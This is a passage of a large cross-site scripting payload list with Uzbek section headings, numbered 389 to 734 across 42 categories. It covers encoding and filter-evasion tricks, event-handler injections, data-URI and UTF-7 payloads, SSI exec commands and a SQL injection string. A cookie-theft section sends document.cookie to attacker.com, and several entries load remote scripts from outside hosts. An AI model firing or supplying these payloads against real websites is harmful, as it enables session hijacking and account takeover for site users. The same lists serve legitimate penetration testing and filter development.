15. BGSOUND, LAYER, BR tegi orqali XSS
================================================================================

389. <BGSOUND SRC="javascript:alert('XSS');">
390. <BR SIZE="&{alert('XSS')}">
391. <LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
392. <BGSOUND SRC="javascript:document.cookie=true;">
393. <BR SIZE="&{document.cookie=true}">
394. <LAYER SRC="javascript:document.cookie=true;"></LAYER>
395. <BGSOUND SRC="javascript:alert('CrossSiteScripting');">
396. <BR SIZE="&{alert('CrossSiteScripting')}">
397. <marquee/onstart=confirm(2)>/
398. <marquee onstart='javascript:alert&#x28;1&#x29;'>^__^
399. <marquee<marquee/onstart=confirm(2)>/onstart=confirm(1)>
400. &#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera}

================================================================================
16. FRAMESET tegi orqali XSS
================================================================================

401. <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
402. <FRAMESET><FRAME SRC="javascript:document.cookie=true;"></FRAMESET>

================================================================================
17. XML va SPAN tegi orqali XSS
================================================================================

403. <XML ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:alert('XSS')"&gt;</B></I></XML> <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
404. <XML SRC="xsstest.xml" ID=I></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
405. <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
406. <XML SRC="xsstest.xml" ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
407. <XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
408. <xml src="javascript:document.cookie=true;">
409. <xml id="X"><a><b><script>document.cookie=true;</script>;</b></a></xml>
410. <div datafld="b" dataformatas="html" datasrc="#X"></div>

================================================================================
18. URL encoding orqali XSS
================================================================================

411. %27%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%27%48%65%6C%6C%6F%27%29%3C%2F%73%63%72%69%70%74%3E
412. %22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%27%48%65%6C%6C%6F%27%29%3C%2F%73%63%72%69%70%74%3E
413. %3E%22%27%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%27%58%53%53%27%29%3C%2F%73%63%72%69%70%74%3E
414. %2F%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%27%48%65%6C%6C%6F%27%29%3C%2F%73%63%72%69%70%74%3E
415. %u0027%u003e%u003c%u0073%u0063%u0072%u0069%u0070%u0074%u003e%u0061%u006c%u0065%u0072%u0074%u0028%u0027%u0048%u0065%u006c%u006c%u006f%u0027%u0029%u003c%u002f%u0073%u0063%u0072%u0069%u0070%u0074%u003e
416. %u0022%u003e%u003c%u0073%u0063%u0072%u0069%u0070%u0074%u003e%u0061%u006c%u0065%u0072%u0074%u0028%u0027%u0048%u0065%u006c%u006c%u006f%u0027%u0029%u003c%u002f%u0073%u0063%u0072%u0069%u0070%u0074%u003e
417. %u003e%u0022%u0027%u003e%u003c%u0073%u0063%u0072%u0069%u0070%u0074%u003e%u0061%u006c%u0065%u0072%u0074%u0028%u0027%u0058%u0053%u0053%u0027%u0029%u003c%u002f%u0073%u0063%u0072%u0069%u0070%u0074%u003e
418. %u002f%u003e%u003c%u0073%u0063%u0072%u0069%u0070%u0074%u003e%u0061%u006c%u0065%u0072%u0074%u0028%u0027%u0048%u0065%u006c%u006c%u006f%u0027%u0029%u003c%u002f%u0073%u0063%u0072%u0069%u0070%u0074%u003e
419. %0027%003e%003cscript%003ealert%0028%0027Hello%0027%0029%003c%002fscript%003e
420. %0022%003e%003cscript%003ealert%0028%0027Hello%0027%0029%003c%002fscript%003e
421. %003e%0022%0027%003e%003cscript%003ealert%0028%0027XSS%0027%0029%003c%002fscript%003e
422. %002f%003e%003cscript%003ealert%0028%0027Hello%0027%0029%003c%002fscript%003e
423. %3CSCRIPT%3Ealert%283%29%3C%2FSCRIPT%3E
424. %22%20onmouseover%3dalert(String.fromCharCode(88,83,83))%20par%3d%22
425. %3Cbody%20onload=alert(document.cookie)%3E
426. %3ciMg+SrC%3dx+OnErRoR%3dalert(51336)%3e
427. <img%20src%3da%20onerror%3dalert(1)>
428. %22%20style%3D%22background:expression(alert(1))%22%20OA%3D%22
429. 3c%2fscript%3e%3cscript%3ealert(1);%3c%2fscript%3e
430. %C0%BCscript%C0%BEalert(1)%C0%BC/script%C0%BE
431. %A2%BE%BCscript%BEalert(%A2XSS%A2)%BC/script%BE
432. %E2%80%B9%25tag+style%3D%22xss%3Aexpression%28alert%28123%29%29%22+%E2%80%BA
433. %uff1cscript%uff1ealert(123456);%uff1c/script%uff1e
434. %uff1cscript%uff1ealert(123456)%uff1c/script%uff1e
435. %uff1cscript%uff1ealert('vulnerability')%uff1c/script%uff1e
436. %uff1cscript%uff1ealert(document.cookie)%uff1c/script%uff1e
437. %3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%27%69%20%61%6D%20%68%65%72%65%27%29%3C%2F%73%63%72%69%70%74%3E
438. %3CIFRAME+SRC%3D%22javascript%3Aalert(1)%3B%22%3E%3C%2FIFRAME%3E
439. %3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%74%65%73%74%2E%64%65%3E
440. &#x3C;&#x69;&#x66;&#x72;&#x61;&#x6D;&#x65;&#x20;&#x73;&#x72;&#x63;&#x3D;&#x68;&#x74;&#x74;&#x70;&#x3A;&#x2F;&#x2F;&#x74;&#x65;&#x73;&#x74;&#x2E;&#x64;&#x65;&#x3E;
441. &#60&#105&#102&#114&#97&#109&#101&#32&#115&#114&#99&#61&#104&#116&#116&#112&#58&#47&#47&#116&#101&#115&#116&#46&#100&#101&#62
442. PGlmcmFtZSBzcmM9aHR0cDovL3Rlc3QuZGU+
443. %22%27%2F%3E%3Cscript%3Ealert%28'Props+To+TheRat'%29%3C%2Fscript%3E
444. %BCscript%BEalert(%A2XSS%A2)%BC/script%BE
445. ¼script¾alert(¢XSS¢)¼/script¾
446. ¼script¾document.cookie=true;¼/script¾
447. ¼script¾alert(¢CrossSiteScripting¢)¼/script¾
448. data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=
449. %22%20onload=%22this.src='http://www.unirostock.de';this.onload=function(){};%22%20x=%22
450. XSS%22%3E%3C/div%3E%3Ciframe%20src=http://www.unirostock.de%20style=width:600px;height:500px%3E

================================================================================
19. UTF-7 va maxsus encoding orqali XSS
================================================================================

451. +ADw-script+AD4-alert(document.location)+ADw-/script+AD4-
452. %2bADw-script%2bAD4-%0d%0aalert(1)%2bADw-%2fscript%2bAD4-
453. %2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-
454. +ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi-
455. %2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-
456. +ADw-/title+AD4APA-meta http-equiv+AD0-'content-type' content+AD0-'text/html+ADs-charset+AD0-utf-7'+AD4-
457. %2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-&oe=Windows-31J
458. %2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-&oe=CP932
459. %2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-&eo=MS932
460. %2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-&cs=jis
461. %2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-&charset=utf8
462. %2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-&enc=sjis
463. http://site/utf-7.html?--+AD4-+ADw-script+AD4-alert(document.cookie)+ADw-/script+AD4-
464. <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4-

================================================================================
20. JavaScript unicode/escape orqali XSS
================================================================================

465. \uFF1C%\uFE64input/autofocus onfocus\b='[1].find(alert)'
466. eval("aler"+(!!\[\]+\[\])[+\[\]])("xss")
467. this["document"]["cookie"]
468. window[(+{}+[])[+!![]]+(!\[\]+[])[!+[]+!![]]+([][+[]]+[])[!+[]+!![]+!![\]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]
469. this['ale'+(!![]+[])[-~[]]+(!![]+[])[+[]]](')
470. this['\x64\x6f\x63\x75\x6d'+([][+[]]+[])[!+[]+!![]+!![]]+...]
471. document['\x63\x6f\x6f\x6b\x69\x65']
472. document.write("\u003Cscript src=http://ha.ckers.org/xss.js\u003E\u003C/script\u003E");
473. <iframe\uB\uC\uAsrc\uB\uC\uA=\uB\uC\uA "javascript:alert(1);">
474. <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>

================================================================================
21. onEvent handlerlari orqali XSS
================================================================================

475. "onmouseover='prompt(1)'bad=">
476. "onmouseover='prompt(1)'bad=">
477. " onmouseover=alert(23)
478. "+onkeypress="alert(23)"+"
479. "+onmouseover="alert(1)"+"
480. 111"+onmouseover=alert(11123);
481. 'onfocus='alert(0x000381)'
482. 'onclick='alert(0x000381)'
483. oncontextmenu=prompt(document.cookie)
484. "onmouseover='prompt(1)'bad=">
485. " onfocusin=alert(1) autofocus x="
486. " onfocusout=alert(1) autofocus x="
487. " onblur=alert(1) autofocus a="
488. "autofocusonfocus=alert(1)//
489. <div onmouseover='alert&lpar;1&rpar;'>DIV</div>
490. <div onmouseover="document.cookie=true;">
491. </a onmousemove="alert(1)">
492. <var onmouseover="prompt(1)">On Mouse Over</var>
493. "><h1 ondblclick=prompt(document.domain)>xss by evan</h1>
494. "'onmouseover='prompt(1)'bad=">
495. '"><script>alert(document.domain)</script>
496. ">"><img src=x <img src=x onerror=prompt(7)>=<img src=x onerror=prompt(7)>(1)>
497. '+prompt(9)+'
498. false,false,false);});alert(1); //
499. 'onmouseover='alert(0x000381)'

================================================================================
22. SELECT, TEXTAREA, KEYGEN orqali XSS
================================================================================

500. <select autofocus onfocus=alert(1)>
501. <textarea autofocus onfocus=alert(1)>
502. <keygen autofocus onfocus=alert(1)>
503. <textarea></script><img src=1 onerror=alert(document.cookie);>
504. </textarea>"><script>prompt(Evan)</script>
505. //>">"<img/src/onerror=alert(Evan);>
506. <q/oncut=alert(1)>
507. <q/oncut=open()>

================================================================================
23. SQL Injection ko'rinishidagi XSS
================================================================================

508. ' OR '1'='1' #

================================================================================
24. HTML entities va < belgisining turli ko'rinishlari
================================================================================

509. <
510. %3C
511. &lt
512. &lt;
513. &LT
514. &LT;
515. &#60
516. &#060
517. &#0060
518. &#00060
519. &#000060
520. &#0000060
521. &#60;
522. &#060;
523. &#0060;
524. &#00060;
525. &#000060;
526. &#0000060;
527. &#x3c
528. &#x03c
529. &#x003c
530. &#x0003c
531. &#x00003c
532. &#x000003c
533. &#x3c;
534. &#x03c;
535. &#x003c;
536. &#x0003c;
537. &#x00003c;
538. &#x000003c;
539. &#X3c
540. &#X03c
541. &#X003c
542. &#X0003c
543. &#X00003c
544. &#X000003c
545. &#X3c;
546. &#X03c;
547. &#X003c;
548. &#X0003c;
549. &#X00003c;
550. &#X000003c;
551. &#x3C
552. &#x03C
553. &#x003C
554. &#x0003C
555. &#x00003C
556. &#x000003C
557. &#x3C;
558. &#x03C;
559. &#x003C;
560. &#x0003C;
561. &#x00003C;
562. &#x000003C;
563. &#X3C
564. &#X03C
565. &#X003C
566. &#X0003C
567. &#X00003C
568. &#X000003C
569. &#X3C;
570. &#X03C;
571. &#X003C;
572. &#X0003C;
573. &#X00003C;
574. &#X000003C;
575. \x3c
576. \x3C
577. \u003c
578. \u003C

================================================================================
25. String.fromCharCode orqali XSS
================================================================================

579. ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
580. alert(String.fromCharCode(88,83,83))
581. <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
582. ">">alert(String.fromCharCode(88,83,83));
583. ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(67, 114, 111, 115, 115,...))//
584. '+prompt(String.fromCharCode(120,+115,+115))//\'+

================================================================================
26. Cookie o'g'irlash uchun XSS payloadlar
================================================================================

585. '><script>document.location='http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie</script>'
586. ";document.write('<img sr'%2b'c=http://www.site.com/xss?'%2bdocument['cookie']%2b'>');//
587. alert(document.cookie)
588. alert(document['cookie'])
589. with(document)alert(cookie)
590. \";alert(document.cookie);//
591. >"%3C/TITLE%3E<SCRIPT>alert(document.cookie);</SCRIPT>
592. "><%tag style="xss:expression(alert(document.cookie))" %>
593. "><script>alert(document.cookie)</script>
594. ');alert(document.cookie)//

================================================================================
27. PHP va Server-Side kod injection
================================================================================

595. ">"><% response.write "<script type=text/javascript>alert(document.cookie)</script>" %>
596. <?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>alert(document.cookie);</html:script></html:html>
597. <? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?>
598. <!--#exec cmd="/bin/echo '<SCR'" --><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"-->
599. <? echo('<SCR)'; echo('IPT>document.cookie=true</SCRIPT>'); ?>

================================================================================
28. DIV tegi orqali XSS
================================================================================

600. <div/style="width:expression(confirm(1))">X</div> {IE7}
601. <div/onmouseover='alert(1)'> style="x:">
602. <div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>
603. <iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">

================================================================================
29. Obfuskatsiya va aralash usullar
================================================================================

604. --></sCrIpT><sCrIpT>alert(1234)</sCrIpT>
605. *//"><script>/*alert(1)//
606. %0aalert(1);/"><script>///
607. \%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//
608. \'});%0aalert(1);%20//
609. "();|]*{%0d%0a<%00
610. /<svg%20onload=alert(eval('document'+unescape(unescape("%252e"))%2b'domain'))>
611. test'"()&%<acx><ScRiPt >prompt(1)</ScRiPt>
612. "()&%<ScRiPt >prompt(/XSS/)</ScRiPt>
613. '"--></style></script><script>alert(/xss/)</script>
614. \'\";<script>alert(1)</script>
615. </title><!-- --><body onload=alert(1);></iframe src=http://google.com>-->
616. '"onmouseover="prompt(1)"
617. </script>">'><script>prompt(String.fromCharCode(88.83.83))</script>
618. ">'"<script>alert('Props To TheRat')</script>"
619. //x:1/:///%01javascript:alert(document.cookie)/
620. <--`<img/src=` onerror=alert(1)> --!>
621. </plaintext\></|\><plaintext/onmouseover=prompt(1)
622. </style ><script  :-(>/**/alert(document.location)/**/</script  :-(>
623. <///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN
624. //|\\  <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'>  //|\\ </script //|\\
625. \";alert(1);//
626. ";"; alert(1)//
627. ?29ced"><script>alert(1)</script>9d013=1
628. ''>

================================================================================
30. autofocus orqali XSS
================================================================================

629. " autofocusonfocus=alert(1)//
630. ' autofocus onfocus=alert(0x000381)'
631. <sVg><scRipt %00>alert&lpar;1&rpar; {Opera}
632. <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?>
633. &#34;&#62;<h1/onmouseover='\u0061lert(1)'>%00
634. <a/href="javascript:\u0061lert&#x28;1&#x29;"><input type="X">
635. <form><isindex formaction="javascript&colon;confirm(1)">

================================================================================
31. RSS va XML channel orqali XSS
================================================================================

636. <rss version="2.0">
 <channel>
   <item>
     <title>BIZNET RSS XSS TEST &lt;script>alert("BIZNET");&lt;/script></title>
   </item>
 </channel>
</rss>

================================================================================
32. Data URI orqali XSS
================================================================================

637. <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
638. javascript:/*-->]]>%>?></script></title></textarea></noscript></style></xmp>">[img=1,name=/alert(1)/.source]...
639. data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=
640. <a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09;&#10;&#11;>X</a>
641. <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
642. <iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>">
643. <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
644. <iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'>
645. <script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script>
646. <script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script>

================================================================================
33. console va CLI orqali XSS
================================================================================

647. set vlan name 1337 <script>alert(document.cookie)</script>
648. set system name <iframe src=http://www.vulnerability-lab.com>
649. set system location "><iframe src=a onload=alert("VL") <
650. set system contact <script>alert('VL')</script>
651. insert <script>alert(document.cookie)</script>
652. add topic <iframe src=http://www.vulnerability-lab.com>
653. add name <script>alert('VL')</script>
654. perl -e 'print "<IMG SRC=java\0script:alert(\"CrossSiteScripting\")>";' > out
655. perl -e 'print "<SCR\0IPT>alert(\"CrossSiteScripting\")</SCR\0IPT>";' > out

================================================================================
34. Qatorma-qator (per-line) XSS
================================================================================

656. <IMG
SRC
=
"
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
'
V
L
A
B
'
)
"
>

================================================================================
35. Telefon raqami filtri orqali XSS
================================================================================

657. +49/>"><iframe src=http://vulnerability-lab.com>1337
658. "><iframe src='' onload=alert('mphone')>
659. <iframe src=http://vulnerability-lab.com>1337+1

================================================================================
36. Email filtri orqali XSS
================================================================================

660. "><iframe src=http://vulnerability-lab.com/>@gmail.com
661. "><script>alert(document.cookie)</script><div style="1@gmail.com
662. "><script>alert(document.cookie)</script>@gmail.com
663. <iframe src=http://vulnerability-lab.com/>@gmail.com
664. <script>alert(document.cookie)</script><div style="1@gmail.com
665. <script>alert(document.cookie)</script>@gmail.com

================================================================================
37. HTTP Redirect orqali XSS
================================================================================

666. <IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
667. Redirect 302 /vlab.jpg http://vulnerability-lab.com/admin.asp&deleteuser
668. 0;url=javascript:alert(1)" http-equiv="refresh" "

================================================================================
38. Action Script (Flash) orqali XSS
================================================================================

669. <object type="application/x-shockwave-flash" data="http://www.vulnerability-lab.com/hack.swf" width="300" height="300">
    <param name="movie" value="http://www.subhohalder.com/xysecteam.swf" />
    <param name="quality" value="high" />
    <param name="scale" value="noscale" />
    <param name="salign" value="LT" />
    <param name="allowScriptAccess" value="always" />
    <param name="menu" value="false" />
</object>

================================================================================
39. Yopuvchi taglar bilan XSS (close TAG)
================================================================================

670. >"><meta http-equiv="refresh" content="0;url=javascript:document.cookie=true;">
671. >"><SCRIPT>document.cookie=true;</SCRIPT>
672. >"><IMG SRC="javascript:document.cookie=true;">
673. >"><IFRAME SRC="javascript:document.cookie=true;"></IFRAME>
674. >"><FRAMESET><FRAME SRC="javascript:document.cookie=true;"></FRAMESET>
675. >"><BASE HREF="javascript:document.cookie=true;//">
676. >"><TABLE BACKGROUND="javascript:document.cookie=true;">
677. >"><TABLE><TD BACKGROUND="javascript:document.cookie=true;">
678. >"><DIV STYLE="background-image: url(javascript:document.cookie=true;)">
679. >"><DIV STYLE="width: expression(document.cookie=true);">
680. >"><STYLE TYPE="text/javascript">document.cookie=true;</STYLE>

================================================================================
40. Manfiy qiymat bilan XSS (negative value)
================================================================================

681. -1<script>document.cookie=true;</script>
682. -1<IMG SRC="javascript:document.cookie=true;">
683. -1<IFRAME SRC="javascript:document.cookie=true;"></IFRAME>
684. -1<BODY ONLOAD=document.cookie=true;>
685. -1<SCRIPT>a=/CrossSiteScripting/\ndocument.cookie=true;</SCRIPT>
686. -1<INPUT TYPE="IMAGE" SRC="javascript:document.cookie=true;">
687. -1<BASE HREF="javascript:document.cookie=true;//">
688. -1<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:document.cookie=true;">
689. -1<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.cookie=true</SCRIPT>">
690. -1<TABLE BACKGROUND="javascript:document.cookie=true;">
691. -1<DIV STYLE="background-image: url(javascript:document.cookie=true;)">
692. -1<DIV STYLE="width: expression(document.cookie=true);">
693. -1<STYLE TYPE="text/javascript">document.cookie=true;</STYLE>

================================================================================
41. Math, MathML orqali XSS
================================================================================

694. <math><a xlink:href="//jsfiddle.net/t846h/">click
695. <math><a xlink:href="//jsfiddle.net/t846h/">click

================================================================================
42. Misc / Boshqa usullar
================================================================================

696. alert(document.cookie)
697. alert(document['cookie'])
698. with(document)alert(cookie)
699. ">;alert(1)//
700. \'%26%26\'javascript:alert%25281%2529//
701. "onmouseover='prompt(1)'bad=">
702. <SCRIPT>alert('XSS')</SCRIPT>
703. <SCR\0IPT>alert("XSS")</SCR\0IPT>
704. <img src="/" =_=" title="onerror='prompt(1)'">
705. <sVg><scRipt %00>alert&lpar;1&rpar; {Opera}
706. <img src ?itworksonchrome?\/onerror = alert(1)
707. <a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a
708. http://www.google<script .com>alert(document.location)</script
709. <a href="javascript&colon;alert&lpar;document&period;cookie&rpar;">Click Here</a>
710. javascript:alert(1);
711. javascript:/*-->]]>%>?></script></title></textarea></noscript></style></xmp>
712. ";location=location.hash)//#0={};alert(0)
713. '%26%26'javascript:alert%25281%2529//
714. "><option>"><button>img src=x onerror=alert(/xss/);></button></option>
715. </title><script>alert(/xss/)</script>
716. '><script>alert('XSS')</script>
717. "><iframe onclick=alert(Evan)></iframe>
718. <img/src="mars.png"alt="mars">
719. <SCR\0IPT>alert("XSS")</SCR\0IPT>
720. exp/*<XSS STYLE='no\xss:noxss("*//*");xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'>
721. ject data=javascript&colon;\u0061&#x6C;&#101%72t(1)><ob
722. <script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script>
723. </script><img/*%00/src="worksinchrome&colon;prompt&#x28;1&#x29;"/%00*/onerror='eval(src)'>
724. <script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/>
725. <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
726. <img src=`%00`&NewLine; onerror=alert(1)&NewLine;
727. <form><isindex formaction="javascript&colon;confirm(1)">
728. </font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style>
729. <svg xmlns:xlink="http://www.w3.org/1999/xlink"><a><circle r=100 /><animate attributeName="xlink:href" values=";javascript:alert(1)" begin="0s" dur="0.1s" fill="freeze"/>
730. <a[\x0b]onmouseover=location='\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x61\x6C\x65\x72\x74\x28\x30\x29\x3B'>
731. ?attribute='</script><body onload&value=alert(document.cookie)
732. ?value=A%27)%3b}%3balert(document.cookie)%3bif(0){var+html%3dwindow.opener.document.querySelector(%27[%3d%22
733. ?value=%22a%27);//%3C/script%3E%3Cbody%20onload=alert(document.cookie)%3E
734. ?templid=1%27%22%3E%3Cscript%3Ealert%28%27XSS%20@%20%27%2bdocument.domain%29%3C%2fscript%3E

================================================================================
JAMI: 734 ta payload 42 ta turkumga ajratildi
================================================================================
